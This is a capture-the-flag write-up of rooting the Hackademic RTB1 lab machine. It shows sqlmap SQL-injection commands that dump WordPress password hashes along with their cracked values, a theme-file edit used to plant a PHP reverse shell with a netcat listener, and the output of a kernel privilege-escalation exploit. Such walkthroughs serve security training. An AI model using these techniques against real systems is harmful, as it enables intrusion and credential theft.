Mission statement

Get root and read the contents of the file ‘key.txt’ in the root directory.

Recon

I started with a port scan of the target, but only the 80 port is open:

hackademic website

I looked at the links and noticed the URL for the post is http://192.168.80.162/Hackademic_RTB1/?p=9 and for the archives is http://192.168.80.162/Hackademic_RTB1/?cat=1 . Before going to Sqlmap, I manually inserted quotes in the URLs and sure enough, a SQL error for the cat parameter:

sql error

Exploit

Next I enumerated the databases with Sqlmap:

sqlmap -u "http://192.168.80.162/Hackademic_RTB1/?cat=1" --dbms=MySQL --dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress

Since this is a web-based challenge, I proceeded to look into the wordpress database:

sqlmap -u "http://192.168.80.162/Hackademic_RTB1/?cat=1" --dbms=MySQL -D wordpress --tables
Database: wordpress
[9 tables]
+-------------------+
| wp_categories     |
| wp_comments       |
| wp_linkcategories |
| wp_links          |
| wp_options        |
| wp_post2cat       |
| wp_postmeta       |
| wp_posts          |
| wp_users          |
+-------------------+

I further enumerated the wp_users table and here I am showing only the relevant information:

user_pass                user_login
21232f297a57a5a743894a0e4a801fc3  NickJames
b986448f0bb9e5e124ca91d3d650f52c  JohnSmith
7cbb3252ba6b7e9c422fac5334d22054  GeorgeMiller
a6e514f9486b83cb53d8d932f9a04292  TonyBlack
8601f6e1028a8e8a966f6c33fcd9aec4  JasonKonnors
50484c19f1afdaf3841a0d821ed393d2  MaxBucky

Cracking the hashes revealed the passwords of all the users:

admin
PUPPIES
q1w2e3
napoleon
maxwell
kernel

Then I went to the Wordpress login page at http://192.168.80.162/Hackademic_RTB1/wp-login.php and logged in as NickJames (assumed he was admin because of his password). But there was nothing extraordinary to be done with his privileges, just adding and editing posts. We have more users to try though! When I reached GeorgeMiller, I noticed there were more actions available in the admin panel:

admin panel

In the Presentation tab I could edit themes for the site. I picked the 404.php file and replaced its content with a line that would echo something first, so I don’t waste my time with shells without checking if code is executed successfully.

php file edited

When I went to the http://192.168.80.162/Hackademic_RTB1/wp-content/themes/starburst/404.php URL, I saw RCE displayed, so next I used the now-familiar reverse PHP shell from pentestmonkey. Set up my listener and visited the URL again to receive the shell:

nc -vnlp 5555
listening on [any] 5555 ...
connect to [192.168.80.161] from (UNKNOWN) [192.168.80.162] 50723
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
 13:23:45 up  3:04,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=489(apache) groups=489(apache)
sh: no job control in this shell

Privilege escalation

The shell kept echoing back the commands I was running but otherwise it worked fine. I didn’t find anything interesting that I could use during local enumeration, so I then searched for privilege escalation exploits that might apply to the kernel version 2.6.31 found on the box. The exploit that worked was the RDS privilege escalation exploit by Dan Rosenberg. You can also find it on Kali with Searchsploit. I compiled it on my machine with the -m32 flag for the target architecture and transfered it via netcat. Then I ran it and I stared a bit at the blinking cursor before confirming that it gave me root:

sh-4.0$ ./rds
./rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
cat /root/key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)

$_d&jgQ>>ak\#b"(Hx"o<la_%

Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com

Debriefing

The machine looked pretty tightly locked with only a web server running. But the WordPress version was contained a known SQLi exploit that handed down the hashes for the users. One user had the rights to upload code on the server and facilitated geting (limited) access on the target. The kernel was vulnerable to a local root exploit, and from there it was game over.

GG, nice VM! Now let’s end with some wisdom straight from the cow’s mouth:

/ Don't relax! It's only your tension \
\ that's holding you together.        /
 -------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Core dump overflow

Core dump in progress...

Pentest lab - Hackademic RTB1

Mission statement

Recon

Exploit

Privilege escalation

Debriefing

Comments